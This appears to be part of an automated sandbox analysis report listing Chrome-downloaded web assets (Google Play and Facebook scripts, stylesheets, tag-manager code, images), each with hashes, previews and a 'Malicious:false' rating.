                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFv=..WEBPVP8X..............VP8 .=.......*....>i*.E."../6|.@..h.p..ge.....*}..?.?.......ky.t_.?........D.7.o......V../R.......7.K.#.....oP....z.=..s.:.u...................C.."....G?$.&}.j;.r?......~........}.....z......r.3......._.~.?.....'..........R........./...O.....?.{.........;..9"...l.P..S.......Bg.k....7..MO#/.n..u.^.Qi.l.Z.....y'bw.._.w/..9}I6.d.......0<..Y5.Y..^.....$Y.."....M...h..5..kqk.Eg.....4....H.3.1<.......P...}.E...@.*Y.........=4.E..........c.(...p..l...zJ{..,..[V`..|.:.A...`4..z..<...S.....]X.9_...3.;...o.Q(....>&.>.O.....Kn^.E.ZP....,...G....F].l_.y......W....V...Z:.Om;./..7E.t_.Z0..-JV....*.J?V....I..K..y.h.2X7.S.(R.F;@..>.."cZ.../=.(X....*;BX-X<.h?L.6...4?.%.<.5...T.dx;kx....p......o<..7R.e~.2.........*Aw.F^..7.,...7.o.yY.W.....oY.B4W.U.......D{;.....l3.c..#.3g.g.,.p.....].=.M......y...2.(..../4.w=a.<. .H8y...y.9K..t......>(..G.......c....J.<.:.....cx.......t~C..|.v9...n..`:..Y.h...L.&Z...^m....".......?..s..eR..<.9bt..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (970)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):20164
                                                                                                                                                                                                                                  Entropy (8bit):5.7099139939270005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:jiJBhuEyXdKXkZyw+4/YHRDgvHUsWd4jKMbxYWRobPnj/Cp0LnRgCRWwq0tSxUVr:jiJBOXUUZyw+4/YHRcvHlWd4jKMbxYUY
                                                                                                                                                                                                                                  MD5:CC2B86A5E2CBBDB882CB8B4D5A1D2E03
                                                                                                                                                                                                                                  SHA1:8777110EF4C3C54E04A59874BE7DD34B8FB587C9
                                                                                                                                                                                                                                  SHA-256:F2EEEEE41B760E13FBB1CBD8A691E2BC9DEA33A6B8364863E0FDEC4BACC13812
                                                                                                                                                                                                                                  SHA-512:B0FB29E9C8B841F329D4DE8BA3F4AEDF3E094F8DFC74396CA847CFE074A7EE2599CB66D6D365997D414637B060DA5B18160B46932D8E016B34C4ECE29A9503EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,GkRiKb,HnDLGf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,rpbmN,s39S4,soHxf,tKHFxf,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=dfkSTe"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.rf(_.upa);._.u("sOXFj");.var qxa=class extends _.Dq{constructor(a){super(a.ta)}H(a){return a()}};_.Eq(_.tpa,qxa);._.w();._.u("oGtAuc");._.hxa=new _.ae(_.upa);._.w();._.ixa=class extends _.Pk{static Ia(){return{Sl:{VY(a){return _.Jd(a)}}}}constructor(a){super(a.ta);this.soy=this.Tj=null;if(this.Pk()){var b=_.Hj(this.Yh(),[_.ek,_.dk]);b=_.Pe([b[_.ek],b[_.dk]]).then(function(c){this.soy=c[0];this.Tj=c[1]},null,this);_.Qk(this,b)}this.Na=a.Sl.VY}ep(a){return this.Na.ep(a)}getData(a){return this.Na.getData(a)}ir(){_.ml(this.Tj.hf())}iH(){}};_.qr=(a,b)=>{a&&_.ce.Eb().register(a,b)};._.u("q0xTif");.var kxa=function(a){const b=c=>{_.Yk(c)&&(_.Yk(c).oc=null,_.br(c,null));c.XyHi9&&(c.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(let c=0;c<a.length;c++)b(a[c])};var lxa,mxa,nxa,oxa;lxa=function(a){const b=a.Xa();return(...c)=>a.Ra.H(()=>b(...c))};mxa=function(a){const b=a.V();return b?(.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2112)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15767
                                                                                                                                                                                                                                  Entropy (8bit):5.317199369389832
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:oDTfwJsGxuBRllOkUP7L4wX1lu1kL0tZJcfA8gT/6SdVQTu9ot:o3w6YuBRiaP/uNU/rG
                                                                                                                                                                                                                                  MD5:5F9F4B37178B22CF0BC17D208D462D0F
                                                                                                                                                                                                                                  SHA1:FC8811CBF718389DEF90F61F9B97B08CA38EE485
                                                                                                                                                                                                                                  SHA-256:AFEBF18C540269CCB206F992F07AF41E3B1AD61697249502709AE68E39A94C1D
                                                                                                                                                                                                                                  SHA-512:71744081CA31B871B5D8EC3573EBBF8D80B8875EC7B49D2392E70B4F2D4541F5E12808C7B5B0F98220E70969A3F88B1B89DD00C86CCFC6B7827BD54762685224
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/BGMvuu7HwCF.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractPopoverButton.react",["cx","URI","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j,k=j||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var d=b.prototype;d.render=function(){var a=this.props.config,b={},d=a.defaultMaxWidth;this.props.maxwidth!==void 0&&(d=this.props.maxwidth);d&&(b.style=babelHelpers["extends"]({},a.button.props.style,{maxWidth:d+"px"}));this.props.image&&(b.image=k.jsx("span",{className:"_-xe _3-8_",children:this.props.image}));this.props.label&&(b.labelIsHidden=this.props.labelIsHidden,b.label=k.jsx("span",{className:"_55pe",children:this.props.label}));this.props.haschevron&&(b.imageRight=k.jsx("span",{className:"_4o_3",children:a.chevron}));b.className=c("joinClasses")(a.button.props.className,"_2agf _4o_4");b.href=new(i||(i=c("URI")))("#");b["aria-haspopup"]=!0;b.role="button";return k.cloneElement(a.button,b)};return b}(k.Component);a.defaultProps={haschevron:!0};g[
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):44186
                                                                                                                                                                                                                                  Entropy (8bit):7.9957393921993045
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:4PSx3okLo1GwbzY8Me9Co0hDMG/ztToefE7/6ca0bkMs/BFC:4Pk4FTbX30h7dFmSIkMe8
                                                                                                                                                                                                                                  MD5:9E9F2E2752A93831B4F40EE079EA554F
                                                                                                                                                                                                                                  SHA1:D166D1D70635A2253541495ADBA0F8B53A59D00C
                                                                                                                                                                                                                                  SHA-256:FF0194F7EA712A1E4BE2C9BF0FB391740083A8E59F77DAE003FAF6FAC2B988A6
                                                                                                                                                                                                                                  SHA-512:B52262584AA05C110C7046A77916B02DF6ACEBA4C50527DECA391607E709F5B7181FE9952409E50417AD5E61D5D51D289C2234721FA843770AB5BBF02C6C6A5B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/EJpSmrjgF0pNb3uY7ITLZ-4gtePSnRB9jXV3r-x_HBTIcm3MZ0s6GZzoPiV7OklNBA=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....P....*..(.>q*.E..!.L..H....E..X/A.o......~.....=......h........I...............?...O.?._..._.~.?....!.{.../.....x..=@.......k......7.g...g...O.....?v>..j.........}.....G.........._3...#........W.?.=.........y.......?...~g...[...../a_.....?...{..a.....?....3.....?.~....G....o.`?........).........x.~.._...../.....~..~.....w....>.........+.......?....K......./q._....a..~...c.~.PUU.X...Ak(....ol..DS.a..1..0..P...V..H.Hh..$i.4hN,.....>.ovp.....iU0."9...........n.$..n..w.IM._a.............Y|.`........G'...?........6......%b!....T......0..R.....'..C.-3b.)..E..8~>.[.-/....(.=0".p.....!:....).RJ.#MA0F{{.....&.- n.M...E........[.:...m<..4..t.....p...&..T.`..e..@Q~..../...Z...... o.n1B.G...f.{..BS3r+ew....g]..J|.v-[..z.uU..")O#|.{..}[...kC..da}Bs.../....|....._.!.X........}B.f04..#.1....@Q.........>..w.^..T.D*.-t.......>.%o...t:.r.............'m...<.xO.Y..N...D.....}.D.`g.....u.O..a...5u.....d(.u.+....E..)..%6.s.E..&P.$...y.G.H;%G..5.."..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3866)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19130
                                                                                                                                                                                                                                  Entropy (8bit):5.4221724347090605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:RjsiWNwmd+jZ2JU/ZxSb28AFznMpc7F58TfaUj3/3Moq9zbjBRq6LX:Cd+jZ4U/ZAzwznMp058TCUb/3Moq9zbX
                                                                                                                                                                                                                                  MD5:41A724E10E413D9A755408E0B34FF52F
                                                                                                                                                                                                                                  SHA1:10305955D1CA1020491154B0A6335906C15E09BA
                                                                                                                                                                                                                                  SHA-256:8DDEB914D648FE38E704E497B05AE625CAF1C912F9ECB432ED5E55A34E02D3E6
                                                                                                                                                                                                                                  SHA-512:AACC3306AF1988B2B04406247FBFC75C4D5521ECDD34B9FA982642766FE887B44F20019DB8E7607DDE0A189A2B000793D19CD92B332DEE8C3EE5EDDAF341B426
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.aL=class{constructor(a,b,c){this.key=a;this.defaultValue=b;this.flagName=c}ctor(a){return typeof a==="boolean"?a:this.defaultValue}};._.u("RqjULd");.var Pbb=function(){return Obb??(Obb=Object.freeze({ie:a=>_.wd("iCzhFc").H(!1)||a===-1,environment:_.fi(_.wd("y2FhP"))??void 0,mda:_.fi(_.wd("MUE6Ne"))??void 0,Yq:_.fi(_.wd("cfb2h"))??void 0,Ll:_.gi(_.wd("yFnxrf"),-1),eZ:_.Oq(_.wd("fPDxwd")).map(a=>_.gi(a,0)).filter(a=>a>0)}))},Rbb=function(a){if(_.aa&&_.aa.performance&&_.aa.performance.memory){var b=_.aa.performance.memory;if(b){const c=new Qbb;isNaN(b.jsHeapSizeLimit)||_.Eh(c,1,Math.round(b.jsHeapSizeLimit).toString());isNaN(b.totalJSHeapSize)||._.Eh(c,2,Math.round(b.totalJSHeapSize).toString());isNaN(b.usedJSHeapSize)||_.Eh(c,3,Math.round(b.usedJSHeapSize).toString());_.G(a,Qbb,1,c)}}},Vbb=function(a){if(Sbb()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:assembler source, ASCII text, with very long lines (1528)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):11432
                                                                                                                                                                                                                                  Entropy (8bit):5.391308424037816
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:+ybEUczjz2q8cpl8J0PY9pkYx7P05IEGtRQzTd8+klNHM0DzmdPZv:5EU0ce8Jp8S1ezB8Dhuhv
                                                                                                                                                                                                                                  MD5:A0CA8DA461AE5296F5D57E3B4FA57D90
                                                                                                                                                                                                                                  SHA1:A19FBC4243849E0C9BB10F4B12C85C72ACDA54D1
                                                                                                                                                                                                                                  SHA-256:D589C4ABD359EDA36BFC12F42262D7E5EE0A23D6C32B35D59E9674E35D554462
                                                                                                                                                                                                                                  SHA-512:018D08E6B5EC85F82006B2EB1955A20237C9563A355592D265FFC09D960672B5ABA703959A378A994B1F8748D0CCFB5FFECEDD44C02373C73D895C1A7B9E109F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/b-9VvptAdOY.css"
                                                                                                                                                                                                                                  Preview:._9aya{margin:12px 12px 0 12px}._9ayn{background-color:#fff;border:1px solid rgba(0, 0, 0, .3);margin:24px auto;width:340px}._9ayf{background-color:#fff;border:1px solid rgba(0, 0, 0, .20);height:500px;margin:24px auto;pointer-events:none;width:340px}._9ayb{background-color:#a4a7ab;border-radius:4px;height:580px;margin:24px auto;position:relative;width:340px}._al24{border-radius:4px;margin:24px auto;width:340px}._9ss5{background-color:#fff;border:1px solid rgba(0, 0, 0, .20);border-radius:0}._9ayc{border:1px solid rgba(0, 0, 0, .20)}._9ayh{display:flex;justify-content:space-between}._9ayi{margin-left:24px;width:452px}._9ss4{margin-left:44px;width:375px}._als3{background-color:#fff;border-radius:16px;height:fit-content}.._5f0d{display:inline-block;overflow:hidden;position:relative;vertical-align:text-bottom}._5i4g{display:block;height:100%;position:absolute;width:100%;z-index:0}._5i4g._5sjv{image-rendering:-webkit-optimize-contrast;image-rendering:optimize-contrast;image-rendering:pixel
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7094
                                                                                                                                                                                                                                  Entropy (8bit):7.959419718247538
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:F3JYFJ9r/nyXq20/1FmCXl4CbMM1kJ2ednlhhuFM:sB+q20/FXl4LM1kjDOM
                                                                                                                                                                                                                                  MD5:28C793A8D42E2BF761FF6BE55C664010
                                                                                                                                                                                                                                  SHA1:70D072E2744B5A30A99FE99AD0AB4ABA2CCDC124
                                                                                                                                                                                                                                  SHA-256:633014DDBE1C4043A35FA963EC4EF649032F924B61BC717DE33C233C19534DF9
                                                                                                                                                                                                                                  SHA-512:32C7123534B0F5F27ACF79A4C16A0A8617DE9AA790B90ED770167A2724A28024855792D949E5D90FEDCDD460DC6DBAADE1C9C4685EE7DDF41F60C64E23301CF3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?...M(l..Avw.......}.w...)..E..... Y8.$I.......g.c.l#.n.x""E*.*....nXG.m..g.W!...x....._.>uZ.......-j..1.....o.A.(h..q......3.........;j...v{.9.."..xL7.....o.v.U...G...IK .80M.5.L..`..i..e.....@fwP..QK..z.=.......d;.M...T......h.h.h.(23$gF......... y..m...~...R..m%.......!+.##.Q;j.....7.l..as^.......4C.9..N.......kx..9..U.I.....m.e..gx............L.g.|.m.m.^.l.m....5......Q..6C.m..#"U.}..y.m.Z.m.m.6N..>.8.....[..$.y..DU6...m..mv..m.k......../.....|....... .@.h.py..........|....a.G{..h.e..B@}d.I....G'...K3.....l.".bi{?.0....h.H..!....$..T.B..{:..Q..x.........&..P....V...|.H(BZ!.....?EQ0 .....c9....> .Q..@.....%5...!.j..YB..-p..$..>.KE.f..Xk"IU0....P....KG......7.W.4T.......9..s.@.=.j.!.......(.....>.....=m>...V5...V..[@.z. D...b....Y.....t...m....3W......b)C'2.......i..e..~....J2.0*..F.....>.....i./.}....U...O*.S.gs.<..+O..k/....x...~..]..-].......~.qx.KT*.].I.@....<\.&....sK7.".D...h/....h-..om
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34932
                                                                                                                                                                                                                                  Entropy (8bit):7.994533284893775
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:pOpwnyGgnzWvL5O12B6zXyjOYJIQwlPGZ0rbt0O7NuZzcNeeI:pOSPL5OdUjJVOPGm3hku6
                                                                                                                                                                                                                                  MD5:E73F9001EE5396D38D082881C334B5E4
                                                                                                                                                                                                                                  SHA1:5C4099CF40586A2980803BC692BE793412FDE1CB
                                                                                                                                                                                                                                  SHA-256:E8DF07EC03DB6CD5E15DD0A874DAA33912EC51B5325548AC6F59F07019D2D8BB
                                                                                                                                                                                                                                  SHA-512:F3F223B00C1B62AEB2BE5E1FA81A68D8E14971901E57002B7F7AA6CA47C2A834739F97E07B45BC136AFB2A6B4884C84F4FA43390CD18AF975E24C3556F5E34DD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFl...WEBPVP8 `...p....*..(.>]&.F#..!)r..p..M....u.Z..B...;.....?..s...{....^....s.?...{.._.=f.....g.'.O.?.~.................?..p.........?...o..b.......M...........'........P.N_<..._.>..........r?....................}C.........w......}..o./.>.........{......W../.?...~3}..;.......g.......j.............?.........S........0sFs.......3.T......P...\.]..,[F...N.Hx..^W..)T.Kz.}6..F..2.W...[..j.d*8.X.._;j....v..[..{.k.ds2{...Q[..O.8.J@.L...T...o..R=.}.{..D....hX...".........R.B.{q*.)......_!...\._.H.]...l..4.m.C8.K0H..\..>@j.....~../.*..6.1.yQ=...c..n...^.Ny{...PyG....DZ..........m.&I.L.....V1.z..=...@>S.)............/..?..1.8...j?y#9...hR6.L.7.B.n.....V9.......b\8k...y....[....i..'0.)y..@;....s.......|.dt=.}...7...X...(.......&6..|...I#:Ecn.....).6..`.!...0U... .9t.]b.'(IM....t.%f...T:."o.....S.,XxB......_.*..L.x..z.a@...._...B..-r......a..'.a..."!.w.C..i..CC.k.....C...y[...g.9....(..#....Y.Q....Ko..?....3.X..X...u..cJX.{#..4...OA.pW.=.%.1.e>.x.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):26183
                                                                                                                                                                                                                                  Entropy (8bit):7.961893257843468
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:o6r+c3b/0LcDNeiMYkByOA9U3f3i3XPOgqGtcI0eqSicWpM8HJCAerjn05axZvMp:xrTDNfCBiUPi3XPOLGLwciMCJkj69RZ
                                                                                                                                                                                                                                  MD5:1378C81C8CC1A0F5635881813A045E9A
                                                                                                                                                                                                                                  SHA1:79F746594E37ABBCD2542AD979366A87E7702E0B
                                                                                                                                                                                                                                  SHA-256:9E956E71D3EC6F80927CB277DAD49D889520AC24F6BDDF91DF857924D9E85041
                                                                                                                                                                                                                                  SHA-512:FB7F9F7B99C732724E117129B3DEEDDE8A760294E99E05455D550170068967D61525131C04FB3148C577C2E804F55AA5F9DFD40EC254FEBA4415DF1E5B263680
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/aP5mQIXxLCE/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF......................................................................................................................................................h...."........................................K.........................!1.AQ."aq.2...BRS.......#r...$bs...3Ct....c...T.................................6........................!1..AQ.a.."Rq.2B....#...b.3$............?....B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... ..B... .?.I........N.H|.y.....Sh....pw....O..-.3.Bg7....C7.?..T}...S'.].....o....`.....R.s...A?...W...?.y..O....[f.4k......*|..'...5..k...q..q..J.....C7.?...#.8.._}......E.{.|.0...o......x&.qI.W...[c..X.....3...O9.6....f..?*.....'..?*..ZKN.q...|........^Y....#.*>.......?...O...._.........PT...O9.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12046)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):315790
                                                                                                                                                                                                                                  Entropy (8bit):5.549114343279459
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:IT0dmGFpmFublq0kd7+hJsEsEemve4s+2o:28bQ/h4JsOv
                                                                                                                                                                                                                                  MD5:5BC7192A375BD25C710245792A6ED5C3
                                                                                                                                                                                                                                  SHA1:17D3CCAEBFC77948FB3D8AAC11FE1630A74D46BA
                                                                                                                                                                                                                                  SHA-256:43C992A32BD9AE334C24BADBB2881F7397E3D2064C9DEA9EE6015BD9156E6DF1
                                                                                                                                                                                                                                  SHA-512:B494410283A88453890FA4C26342FDBF56AE1C4E6BA664D60B48D00EF2074A37A26717CE267C976A1002061F0061268E2F8602D68A05592C2A63C44CFC9B9715
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.googletagmanager.com/gtm.js?id=GTM-K59689F
                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"18",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__j","vtp_name":"navigator.userAgent"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",3],"vtp_name":"originalLocation"},{"function":"__u","convert_case_to":1,"vtp_component":"QUERY","vtp_queryKey":"utm_source","vtp_customUrlSource":["macro",4],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",2],":",["macro",5]]},{"function":"__dbg"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"G-LL
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16485)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):50754
                                                                                                                                                                                                                                  Entropy (8bit):5.58512671694989
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:IUvBxtxY0dVnQ5EkdXZV5h89ytW2Gp+Hs3uIgFg:txosVcZVs137
                                                                                                                                                                                                                                  MD5:865D54109DBCA5EE3B19BDDDC8AD41B3
                                                                                                                                                                                                                                  SHA1:6147FBDAF5A7F2D504CE5203889D2AA690525699
                                                                                                                                                                                                                                  SHA-256:97156C9788A351A431C960D05FED3C89BC614C3838C2D6E027893F94FA25A66F
                                                                                                                                                                                                                                  SHA-512:C23E3AFDACCA46519B4FA2221B2C609899FE500DB6F9F7733E77F698E51338949F14D06AA5BDA4BB0ACBB2AF3D1A5DF77FA61F340D3858994972FFC7A99F5364
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/0QTORSxRVO1.css"
                                                                                                                                                                                                                                  Preview:._agn-{background-color:#1877f2;border-radius:50%;height:20px;width:20px}._agn-:hover{cursor:pointer}._agn-._agn_{background-color:#ebedf0;cursor:default}._agnz ._agn-{display:none}._agnz:hover ._agn-{display:block}.._agmu{background-color:#fff;border-radius:8px;box-shadow:0 2px 12px 2px rgba(0, 0, 0, .1);box-sizing:border-box;transition:height 200ms cubic-bezier(.08,.52,.52,1);width:416px}._agmu ._7w6q{outline:none}._agn0{height:300px;width:300px}.._ag0t{margin:0 -8px}._ag0t._ag0u ._ag0w{background-color:#ecf3ff}._ag0y{border-radius:4px;flex-grow:0;flex-shrink:0;height:16px;margin-right:8px;padding:4px;position:relative;width:16px}._ag0y._ag0u{background-color:#1877f2}._ag0y._ag0z{background-color:rgba(0, 0, 0, .05)}._ag0w{align-items:center;border-radius:6px;box-sizing:border-box;display:flex;padding:8px;width:100%}._ag0w:hover,._ag0t._ag0v ._ag0w{background-color:rgba(0, 0, 0, .05);text-decoration:none}._ag0w ._ag0x{min-width:0}.._ag7f{margin-bottom:24px}._ag7i{border-radius:8px;fle
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11083)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47925
                                                                                                                                                                                                                                  Entropy (8bit):5.63694271144091
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+BtmzebYJGgouKpwSfsbfjgBdtcI1hDRm+YTgfLFLZBk/cNxnOjMNBHLys14WXLb:WLf/0wtcIvPL9Pk/cNBxLys14WXB5H
                                                                                                                                                                                                                                  MD5:A1E5572AB20DA021985F5FA17C38D4F3
                                                                                                                                                                                                                                  SHA1:45E35F3D5778133577DD5F8F75E7648A08363688
                                                                                                                                                                                                                                  SHA-256:71C88C8EB2871184AA06D114FCB5DD2DFB33D22611D48F15C5B2FCD427BD263C
                                                                                                                                                                                                                                  SHA-512:54A43382CACB11813F55A7DF4D8A01C5E35C3F3CE0E3C6FCF2466F667F44E40F62F5E3E38D2F37F7CCDF105A66A802C388F6CEA5B150E9DFE82B1672EC461AD6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
